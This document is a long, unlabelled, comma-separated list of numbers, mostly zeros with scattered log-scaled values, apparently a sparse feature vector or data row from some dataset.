0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.804021044733257, 0.0, 0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.800574088041945, 0.0, 4.06534854782536, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.6635616461296467, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 7.217724106087479, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.6635616461296467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.0301047650807, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.1683892320507745, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 2.833213344056216, 3.4011973816621555, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 3.178053830347946, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 4.49053690687189, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.6931471805599453, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 